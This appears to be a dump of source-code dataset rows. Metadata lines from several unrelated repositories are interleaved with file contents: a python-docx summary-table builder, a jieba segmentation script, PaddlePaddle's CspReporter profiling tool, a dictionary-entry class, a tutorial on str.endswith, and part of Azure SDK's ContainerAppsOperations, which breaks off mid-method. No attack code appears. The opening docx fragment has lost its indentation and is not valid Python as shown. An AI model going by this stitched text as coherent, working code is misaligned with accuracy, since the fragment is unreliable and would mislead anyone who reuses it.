print('Fail to add graph for',name,'. Try manually. ')
# Numeric Variable:
document.add_heading('Numeric Variable Summary: ', level = 2)
# Initiate Summary Table Header
table = document.add_table(rows = 1, cols = 11, style = 'Light Grid Accent 1')
hdr_cells = table.rows[0].cells
hdr_cells[0].text = 'Field'
hdr_cells[1].text = 'Number of Records'
hdr_cells[2].text = 'Populated %'
hdr_cells[3].text = 'Unique Value'
hdr_cells[4].text = 'Number of Zero'
hdr_cells[5].text = 'Most Common Value'
    hdr_cells[6].text = 'Occurrence of Common Value'
hdr_cells[7].text = 'Min'
hdr_cells[8].text = 'Max'
hdr_cells[9].text = 'Average'
hdr_cells[10].text = 'Standard Deviation'
# Fill in Summary Table Cell
num_col = list(num.columns)
for i in range(len(num_col)):
row_cells = table.add_row().cells
for j in range(11):
row_cells[j].text = str(num_table.iloc[i,j])
# Individual Field:
document.add_heading('Individual Fields: ', level = 3)
for i in range(len(num_description1)):
name = num_col[i]
document.add_paragraph(name, style = 'List Number')
document.add_paragraph(num_description1[i], style = 'Body Text')
table = document.add_table(rows = 1, cols = 11, style = 'Light Grid Accent 1')
hdr_cells = table.rows[0].cells
hdr_cells[0].text = 'Field'
hdr_cells[1].text = 'Number of Records'
hdr_cells[2].text = 'Populated %'
hdr_cells[3].text = 'Unique Value'
hdr_cells[4].text = 'Number of Zero'
hdr_cells[5].text = 'Most Common Value'
        hdr_cells[6].text = 'Occurrence of Common Value'
hdr_cells[7].text = 'Min'
hdr_cells[8].text = 'Max'
hdr_cells[9].text = 'Average'
hdr_cells[10].text = 'Standard Deviation'
row_cells = table.add_row().cells
for j in range(11):
row_cells[j].text = str(num_table.iloc[i,j])
try:
document.add_picture(name+'.png')
except:
print('Fail to add graph for',name,'. Try manually. ')
document.save(filename)
| [
"[email protected]"
] | |
61d2d4e19055b2c5e330f42f506a5a25e1550bae | c0b3e2e92efe8e2a2497a0850b136f42e59d9303 | /预分词.py | 86a1088574c1a4fd86b5ef5f69200a42588ea4a9 | [] | no_license | Asuraqi/AushorShipAnalysis | 126236b053a47947f344c05ab73a174650973c8e | 1cc2a96f9e02e31b9f671ab88151fc0138db9c8e | refs/heads/master | 2022-11-17T13:12:05.412748 | 2020-07-11T15:30:09 | 2020-07-11T15:30:09 | 278,858,763 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 932 | py | import os
import re
import numpy as np
import jieba
import jieba.posseg
TRAIN_DIR = r"E:\TrainData"
OUT_DIR = r"D:\output_train"
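# Illustrative input/output line formats for this script (values are made up; the exact
# POS tags come from jieba, so the tags shown are only indicative):
#   input line : "1001\t42\t3\t今天天气很好"   (author_id, novel_id, chapter_id, content)
#   output line: "今天/t 天气/n 很/d 好/a"      (space-joined word/flag pairs)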
for train_file in os.listdir(TRAIN_DIR):
file_path = os.path.join(TRAIN_DIR, train_file)
out_path = os.path.join(OUT_DIR, train_file + ".seg")
    if os.path.exists(out_path):
        print('skip, already segmented: %s' % out_path)
        continue
print(file_path)
with open(out_path, 'w', encoding='utf-8') as out:
with open(file_path, 'r', encoding='utf-8') as f:
for line in f.readlines():
author_id, novel_id, chapter_id, content = line.strip('\n').split('\t')
word_list = []
for word, flag in jieba.posseg.cut(content):
if flag.startswith("x"):
continue
word_list.append(word + "/" + flag)
out.write(' '.join(word_list) + '\n') | [
"[email protected]"
] | |
39765aad0f84ce97c089987f6a920f1900d8407c | 974d04d2ea27b1bba1c01015a98112d2afb78fe5 | /tools/CrossStackProfiler/CspReporter.py | 7ae672a2e99fd3f8e3f64c223b2fc2c9a0b3ecf5 | [
"Apache-2.0"
] | permissive | PaddlePaddle/Paddle | b3d2583119082c8e4b74331dacc4d39ed4d7cff0 | 22a11a60e0e3d10a3cf610077a3d9942a6f964cb | refs/heads/develop | 2023-08-17T21:27:30.568889 | 2023-08-17T12:38:22 | 2023-08-17T12:38:22 | 65,711,522 | 20,414 | 5,891 | Apache-2.0 | 2023-09-14T19:20:51 | 2016-08-15T06:59:08 | C++ | UTF-8 | Python | false | false | 8,467 | py | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import glob
import os
from multiprocessing import Process
from CspFileReader import (
DCGM_PATH,
FILEORGANIZEFORM_BYRANK,
FILEORGANIZEFORM_BYTRAINER,
NET_PATH,
PROFILE_PATH,
TIME_PATH,
getLogger,
)
from DCGMFileReader import dcgmFileReader
from ProfileFileReader import profileFileReader
def get_argparse():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument(
'--profile_path',
type=str,
default='.',
help='Working path that store the monitor data.',
)
parser.add_argument(
'--timeline_path',
type=str,
default='.',
help='Output timeline file name.',
)
parser.add_argument(
'--gpuPerTrainer', type=int, default=8, help='Gpus per trainer.'
)
parser.add_argument(
'--trainerNum', type=int, default=4, help='Num of trainer.'
)
parser.add_argument(
'--groupSize', type=int, default=8, help='Num of trainer in a group.'
)
parser.add_argument(
'--displaySize',
type=int,
default=2,
help='Num of line need to display in a group.',
)
return parser.parse_args()
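# Illustrative invocation (paths and sizes below are placeholders):
#   python CspReporter.py --profile_path ./csp_data --timeline_path ./csp_timeline \
#       --gpuPerTrainer 8 --trainerNum 16 --groupSize 8 --displaySize 2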
class CspReporter:
def __init__(self, args):
self._args = args
print(self._args)
self._workPath = self._args.profile_path
self._saveFilePath = self._args.timeline_path
self._gpuPerTrainer = self._args.gpuPerTrainer
self._groupSize = self._args.groupSize
self._displaySize = self._args.displaySize
self._trainerNum = self._args.trainerNum
self._checkArgs()
self._init_logger()
self._init_timeInfo()
self._init_reader()
def _checkArgs(self):
if self._trainerNum % self._groupSize != 0:
raise Exception(
"Input args error: trainerNum[%d] %% groupSize[%d] != 0"
% (self._trainerNum, self._groupSize)
)
def _init_logger(self):
self._logger = getLogger()
def _init_reader(self):
self._dcgmPath = os.path.join(self._workPath, DCGM_PATH)
self._netPath = os.path.join(self._workPath, NET_PATH)
self._profilePath = os.path.join(self._workPath, PROFILE_PATH)
self._netFileReaderArgs = {
"dataPath": self._netPath,
"groupSize": self._groupSize,
"displaySize": self._displaySize,
"gpuPerTrainer": self._gpuPerTrainer,
"minTimeStamp": self._minTimeStamp,
"organizeForm": FILEORGANIZEFORM_BYTRAINER,
}
self._dcgmFileReaderArgs = {
"dataPath": self._dcgmPath,
"groupSize": self._groupSize,
"displaySize": self._displaySize,
"gpuPerTrainer": self._gpuPerTrainer,
"minTimeStamp": self._minTimeStamp,
"organizeForm": FILEORGANIZEFORM_BYTRAINER,
}
self._profileFileReaderArgs = {
"dataPath": self._profilePath,
"groupSize": self._groupSize,
"displaySize": self._displaySize,
"gpuPerTrainer": self._gpuPerTrainer,
"minTimeStamp": self._minTimeStamp,
"organizeForm": FILEORGANIZEFORM_BYRANK,
}
self._dcgmFileReader = dcgmFileReader(
self._logger, self._dcgmFileReaderArgs
)
self._profileFileReader = profileFileReader(
self._logger, self._profileFileReaderArgs
)
def _init_timeInfo(self):
self._timePath = os.path.join(self._workPath, TIME_PATH)
self._timeInfo = {}
self._minTimeStamp = 0
self._set_timeInfo()
def _set_timeInfo(self, timeFileNamePrefix="time.txt", sed="."):
timeFileNameList = glob.glob(
os.path.join(self._timePath, timeFileNamePrefix, sed, "*")
)
for timeFileName in timeFileNameList:
trainerId = int(timeFileName.split(sed)[-1])
gpuId = int(timeFileName.split(sed)[-2])
info = {}
with open(timeFileName, "r") as rf:
for line in rf:
if line.startswith("start time:"):
info["start_time"] = int(
float(line.split(":")[-1]) * 1e9
)
self._minTimeStamp = min(
self._minTimeStamp, info["start_time"]
)
if line.startswith("end time:"):
info["end_time"] = int(float(line.split(":")[-1]) * 1e9)
if not info:
self._timeInfo[gpuId * trainerId] = info
def _generateTraceFileByGroupAndGpuId(
self, pipileInfo, netInfo, groupId, gpuId
):
dcgmInfoDict = self._dcgmFileReader.getDcgmInfoDict(groupId, gpuId)
opInfoDict = self._profileFileReader.getOpInfoDict(groupId, gpuId)
traceObj = {}
traceObj["traceEvents"] = (
pipileInfo[str(gpuId)]
+ opInfoDict["traceEvents"]
+ dcgmInfoDict["traceEvents"]
+ netInfo["traceEvents"]
)
self._profileFileReader.dumpDict(
traceObj, "traceFile", groupId, gpuId, False, self._saveFilePath
)
def _generateTraceFileByGroup(self, groupId, processNum):
# first we need to generate pipeline info
pipileInfo = self._profileFileReader.getPipeLineInfo(
groupId, processNum
)
# second we need to generate dcgm info
dcgmInfo = self._dcgmFileReader.getDCGMTraceInfo(groupId, processNum)
# third we need to generate net info
netInfo = {}
netInfo["traceEvents"] = []
# netInfo = self._netFileReader.parseFileByGroup(groupId, processNum)
# forth we need to generate op info
opInfo = self._profileFileReader.getOPTraceInfo(groupId)
# finally we need dump this information into disk
processPool = []
pidList = []
for gpuId in range(self._gpuPerTrainer):
subproc = Process(
target=self._generateTraceFileByGroupAndGpuId,
args=(
pipileInfo,
netInfo,
groupId,
gpuId,
),
)
processPool.append(subproc)
subproc.start()
pidList.append(subproc.pid)
self._logger.info(
"[traceFile]: process [%d] has been started, total task num is %d ..."
% (subproc.pid, 1)
)
for t in processPool:
t.join()
pidList.remove(t.pid)
self._logger.info(
"[traceFile]: process [%d] has exited! remained %d process!"
% (t.pid, len(pidList))
)
def generateTraceFile(self, processNum=8):
processPool = []
pidList = []
        for groupId in range(self._trainerNum // self._groupSize):  # integer division so range() receives an int
subproc = Process(
target=self._generateTraceFileByGroup,
args=(
groupId,
processNum,
),
)
processPool.append(subproc)
subproc.start()
pidList.append(subproc.pid)
self._logger.info(
"[GroupTraceFile]: process [%d] has been started, total task num is %d ..."
% (subproc.pid, 1)
)
for t in processPool:
t.join()
pidList.remove(t.pid)
self._logger.info(
"[GroupTraceFile]: process [%d] has exited! remained %d process!"
% (t.pid, len(pidList))
)
if __name__ == '__main__':
args = get_argparse()
tl = CspReporter(args)
tl.generateTraceFile()
| [
"[email protected]"
] | |
3f89fb97ec5363fc81efe42ce4a627e34436e809 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_suite.py | 5d9059953940881ade58e572a6b7dde68f38bcfb | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 525 | py |
#class header
class _SUITE():
def __init__(self,):
self.name = "SUITE"
self.definitions = [u'a set of connected rooms, especially in a hotel: ', u'a set of furniture for one room, of matching design and colour: ', u'a piece of music with several parts, usually all in the same key', u'a set of related software (= computer program) products']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"[email protected]"
] | |
1bdd34e88fd6277b360b09b84201d96e1a50fe44 | 8e24e8bba2dd476f9fe612226d24891ef81429b7 | /geeksforgeeks/python/python_all/143_15.py | 8d67528a49ea0ab7b49f24cfcb96309e98a02750 | [] | no_license | qmnguyenw/python_py4e | fb56c6dc91c49149031a11ca52c9037dc80d5dcf | 84f37412bd43a3b357a17df9ff8811eba16bba6e | refs/heads/master | 2023-06-01T07:58:13.996965 | 2021-06-15T08:39:26 | 2021-06-15T08:39:26 | 349,059,725 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,669 | py | Python | Check if string ends with any string in given list
While working with strings, their prefixes and suffixes play an important role
in many decisions. For data manipulation tasks, we may sometimes need to
check if a string ends with any of a list of matching strings. Let’s discuss certain
ways in which this task can be performed.
**Method #1 : Using filter() + endswith()**
The combination of these two functions can help to perform this particular
task. The filter() call keeps only those suffixes from the target list for which
the string's endswith() check succeeds, so a non-empty result means a match.
# Python3 code to demonstrate
# Checking for string match suffix
# using filter() + endswith()
# initializing string
test_string = "GfG is best"
# initializing suffix list
suff_list = ['best', 'iss', 'good']
# printing original string
print("The original string : " + str(test_string))
# using filter() + endswith()
# Checking for string match suffix
res = list(filter(test_string.endswith, suff_list)) != []
# print result
print("Does string end with any suffix list sublist ? : " +
str(res))
**Output :**
The original string : GfG is best
Does string end with any suffix list sublist ? : True
**Method #2 : Using endswith()**
As an improvement to the above method, it is not always necessary to involve
the filter method in the comparison. This task can be handled solely by passing
the suffix list, converted to a tuple, directly to the endswith() method.
# Python3 code to demonstrate
# Checking for string match suffix
# using endswith()
# initializing string
test_string = "GfG is best"
# initializing suffix list
suff_list = ['best', 'iss', 'good']
# printing original string
print("The original string : " + str(test_string))
# using endswith()
# Checking for string match suffix
res = test_string.endswith(tuple(suff_list))
# print result
print("Does string end with any suffix list sublist ? : " +
str(res))
**Output :**
The original string : GfG is best
Does string end with any suffix list sublist ? : True
| [
"[email protected]"
] | |
f4b33a1d107c661005411ee377782495662a53f5 | d7016f69993570a1c55974582cda899ff70907ec | /sdk/appcontainers/azure-mgmt-appcontainers/azure/mgmt/appcontainers/operations/_container_apps_operations.py | 57696edccfe1612b68eccd942bdcaf4fd0b1173b | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | kurtzeborn/azure-sdk-for-python | 51ca636ad26ca51bc0c9e6865332781787e6f882 | b23e71b289c71f179b9cf9b8c75b1922833a542a | refs/heads/main | 2023-03-21T14:19:50.299852 | 2023-02-15T13:30:47 | 2023-02-15T13:30:47 | 157,927,277 | 0 | 0 | MIT | 2022-07-19T08:05:23 | 2018-11-16T22:15:30 | Python | UTF-8 | Python | false | false | 62,915 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, IO, Iterable, Optional, TypeVar, Union, cast, overload
import urllib.parse
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
from .._serialization import Serializer
from .._vendor import _convert_request, _format_url_section
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_by_subscription_request(subscription_id: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-10-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/providers/Microsoft.App/containerApps")
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_list_by_resource_group_request(resource_group_name: str, subscription_id: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-10-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_get_request(
resource_group_name: str, container_app_name: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-10-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"containerAppName": _SERIALIZER.url("container_app_name", container_app_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_create_or_update_request(
resource_group_name: str, container_app_name: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-10-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"containerAppName": _SERIALIZER.url("container_app_name", container_app_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if content_type is not None:
_headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="PUT", url=_url, params=_params, headers=_headers, **kwargs)
def build_delete_request(
resource_group_name: str, container_app_name: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-10-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"containerAppName": _SERIALIZER.url("container_app_name", container_app_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="DELETE", url=_url, params=_params, headers=_headers, **kwargs)
def build_update_request(
resource_group_name: str, container_app_name: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-10-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"containerAppName": _SERIALIZER.url("container_app_name", container_app_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if content_type is not None:
_headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="PATCH", url=_url, params=_params, headers=_headers, **kwargs)
def build_list_custom_host_name_analysis_request(
resource_group_name: str,
container_app_name: str,
subscription_id: str,
*,
custom_hostname: Optional[str] = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-10-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}/listCustomHostNameAnalysis",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"containerAppName": _SERIALIZER.url("container_app_name", container_app_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
if custom_hostname is not None:
_params["customHostname"] = _SERIALIZER.query("custom_hostname", custom_hostname, "str")
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="POST", url=_url, params=_params, headers=_headers, **kwargs)
def build_list_secrets_request(
resource_group_name: str, container_app_name: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-10-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}/listSecrets",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"containerAppName": _SERIALIZER.url("container_app_name", container_app_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="POST", url=_url, params=_params, headers=_headers, **kwargs)
def build_get_auth_token_request(
resource_group_name: str, container_app_name: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-10-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}/getAuthtoken",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"containerAppName": _SERIALIZER.url("container_app_name", container_app_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="POST", url=_url, params=_params, headers=_headers, **kwargs)
class ContainerAppsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.appcontainers.ContainerAppsAPIClient`'s
:attr:`container_apps` attribute.
"""
models = _models
def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list_by_subscription(self, **kwargs: Any) -> Iterable["_models.ContainerApp"]:
"""Get the Container Apps in a given subscription.
Get the Container Apps in a given subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ContainerApp or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.appcontainers.models.ContainerApp]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.ContainerAppCollection] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_subscription_request(
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_by_subscription.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("ContainerAppCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(get_next, extract_data)
list_by_subscription.metadata = {"url": "/subscriptions/{subscriptionId}/providers/Microsoft.App/containerApps"}
@distributed_trace
def list_by_resource_group(self, resource_group_name: str, **kwargs: Any) -> Iterable["_models.ContainerApp"]:
"""Get the Container Apps in a given resource group.
Get the Container Apps in a given resource group.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ContainerApp or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.appcontainers.models.ContainerApp]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.ContainerAppCollection] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_resource_group_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
